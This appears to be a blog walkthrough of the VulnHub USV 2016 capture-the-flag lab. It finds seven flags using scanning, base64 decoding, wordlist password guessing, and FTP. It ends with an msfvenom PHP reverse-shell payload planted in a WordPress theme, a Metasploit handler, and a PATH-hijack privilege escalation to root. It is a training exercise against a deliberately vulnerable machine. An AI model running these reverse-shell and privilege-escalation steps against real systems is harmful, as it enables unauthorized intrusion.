A new challenge for all of you guys!
This CTF is all about conquering flags
coming across our way as we go further in our penetration testing of this
lab. All the flags should be discovered
in form of: Country name Flag:[md5 hash]. The network interface of this virtual
machine will take it’s IP settings from DHCP.
Download lab from here : https://www.vulnhub.com/entry/usv-2016-v101,175/
Let’s get started with our first step.
netdiscover
From this we get our target IP.
Target IP:
192.168.0.103
Now we will scan it with nmap which
will give us all the open ports in particular lab for further penetration
testing.
nmap
–p- -A 192.168.0.103
This result shows that following ports
are open 22 , 80 , 3129 , 3306 , 21211 and http proxy is used on port 3129.
So now lets proceed with further penetration
testing. Firstly we’ll go with ssh on port 22.
ssh
192.168.0.103
Ssh revealed a ascii Dragon with some
strings and a base64 code written at bottom. Looking closer you’ll see
something written on top AES-ECB.
By Google search we found out that there is a website called aesencryption.net
where we can decrypt the base64 code we got in our last result. So we will
decrypt that code with the given key in image by all this process we arrived at
our 1st flag i.e ITALY FLAG
Ok so now
let’s head towards second flag and for that we are going to open target IP in
browser as port 80 is also open. Look at that. We got access forbidden. No
result.
As we opened target ip in
browser simultaneously we have captured the cookies through burp suite after setting
the manual proxy in browser. When all this is done, right click on its window where
intercepted data is fetched and a kind of action list will put on view further
click to send to repeater.
Look over screenshot below you
will find two panel left and right for request and response respectively. In
the response window the highlighted text is our flag.
As this code is in base64 so we are
going to use HackBar plugin in Mozilla firefox which is preinstalled or can be
easily installed. Whoa decoding the code in it we got another flag which is our
second flag i.e. CROATIA FLAG
Moving ahead, from our nmap result we
got that http-proxy is set on port 3129 so we will set proxy setting for our
target IP with port number 3129 as shown below.
Now try opening target IP in browser
and wait for few seconds like 10 sec. The proxy setting did the trick and
website reveals a single page with a changing banner of “WINTER IS COMING” and
“ALL MEN MUST DIE”. Some of you may be aware of this but for those who do not
know about this. It is Games of Thrones.
The site didn’t show much so I used
nikto scanner with proxy to get some information about it which will be helpful
in further testing.
nikto
–h 192.168.0.103 –useproxy http://192.168.0.103:3129
It reveals a wordpress login at /blog.
Ok! Now open it in browser. Great, Games of
Thrones notion is confirmed as Seven Kingdoms blog is shown.
Scrolling down in this site you can
see that there is an interesting second post which shows ‘I have a message for
you’. There is a highlighted option so jst try to open it in browser.
Awesome!!!! This reveals a message and
a download link for a zip file. Interesting, so go ahead and download it.
Unzipping the file shows an image of a man with a bottle of
perfume and a base64 encoded string at bottom.
Here we decrypt the code in the hackbar plugin which results in
another flag. From this step we got our third flag i.e. PORTUGAL FLAG
Now , returning to previous site there are
several post which are all useless so just scroll down to see if there is
something useful or not and then comes a
last post which is of our interest.
‘Protected: the secret chapter ‘
Oh! We have to provide a password to get through it. This one took
some time and to spare your time I won’t go through my failures,
I have created dictionary of possible passwords which are nothing
but some of the words in this whole page with the help of following command.
cewl –d 2
–m 5 –proxy_host 192.168.0.103 –proxy_port 3129 –w /root/Desktop/dict.txt
http://192.168.0.103/blog/
From the list we get that password is ‘westerosi’
Using this password we came to another page which revealed another
flag in base64 encoded string and below it some kind of images of an actress.
Now again decrypt it in and as a result we have
our fourth flag i.e. PARAGUAY FLAG
Moving to one level up, from site we
got another message that “the mother_of_dragons has a password which is in
right front of your eyes”.
Knowing nothing about the eyes of
actress I restored to google to see if I get any clue from there but no such
luck.
I looked at the message again and it
states ‘password which is in front of your eyes’
That’s the password of mother_of_dragons is ‘in front of your eyes’. But wait a
minute where is this password is used.
We have ftp service running. So let’s
try and get through it
ftp 192.168.0.103 21211
ls
–al
get
.note.txt
exit
cat
.note.txt
bingo! Here that password is used. At
the bottom result shows that children’s name is used for password. Again a
password but this time it is used for wordpress login which we are going to use
in coming steps.
Again I googled and found out she
doesn’t had any children rather had 3 dragons named Drogon , Rhaegal and
Viserion. So I put all these names into a file along with all possible
combinations.
List is small so by entering each one the desired password could
be find out.
Password is
RhaegalDrogonViserion
Apply the credentials for wordpress
and we are in!
Looking around the site I found the
profile section which reveals the base64 encoded string for mother_of_dragons.
Like always decode the base64 code in HackBar
and here we have another flag.
This is our fifth flag i.e. THAILAND FLAG
Now with only 2 flags left its time
for shell access as we have wordpress.
Moving further, firstly make a php
code through msfvenom which can be used to get the meterpreter session.
Msfvenom
–p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 –f raw
Being admin of the site I am able to edit the theme. So I replaced
the 404.php code of template in Viking theme with the above highlighted php
code.
On the other side to get the
meterpreter session open kali terminal and run multi handler. And for that type
the following commands.
Use
exploit/multi/handler
Set
payload php/meterpreter/reverse_tcp
Set
lhost=192.168.0.103
Set
lport=4444
exploit
as we have meterpreter session ,now go
to shell and type following commands
echo
“ import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py
python
/tmp/asdf.py
cd
/srv/http
ls
it shows a reward_flag.txt file so
call it with cat command
cat
reward_flag.txt
As a result we get a base64 encoded
string.
Do not worry soon this decoding thing is going to over as we have
sixth flag with this decoding. So as a result our sixth flag is MONGOLIA FLAG
Back to another file in above list of files i.e.
winterfell_messenger . We see its
executable and owner is root. So run it with following command
./winterfell_messenger
Cat:
/root/message.txt
It shows that it’s using cat command to read a file in the /root
directory.
Using strings shows that cat command
is being used; however it’s not using the full path to the program. From this
we come to know that it will search for set PATH to run.
Now, we are able to update PATH by
using export but first we need to find out the writable directory and for that
we have used /tmp. In /tmp we will create an executable file
named cat so it can be called by the
winterfell_messenger program. This
file will be running as root so we will use /bin/bash to call shell and to change the mode. Run the following
commands.
echo “ /bin/bash” > /tmp/cat
chmod 777 /tmp/cat
echo $PATH
/usr/local/sbin: /usr/local/bin:/usr/sbin:/usr/bin
After this step we
are going to update the PATH to remove the /tmp
directory we added. For this type the
following commands.
Export
PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
Now, we will go to the home directory
of http to get the desired file . For that type
cd /srv/http
ls
now call the winterfell_messenger file by using
given command.
./winterfell_message
id
Now go to root and there we have
.flag.txt file.
Now running cat against .flag.txt we
get a congratulations, a wolf made up of ascii characters and a base64 encoded
string at the bottom. Commands are given below.
cd /root
/usr/sbin/cat
.flag.txt
Finally decoding in hackbar reveals seventh and
last flag which is nothing but the SOMALIA
FLAG
Whoola. We reached at the end and with
this job is done. Hope you enjoyed it and obviously penetration skills are
refreshed.
0 comments:
Post a Comment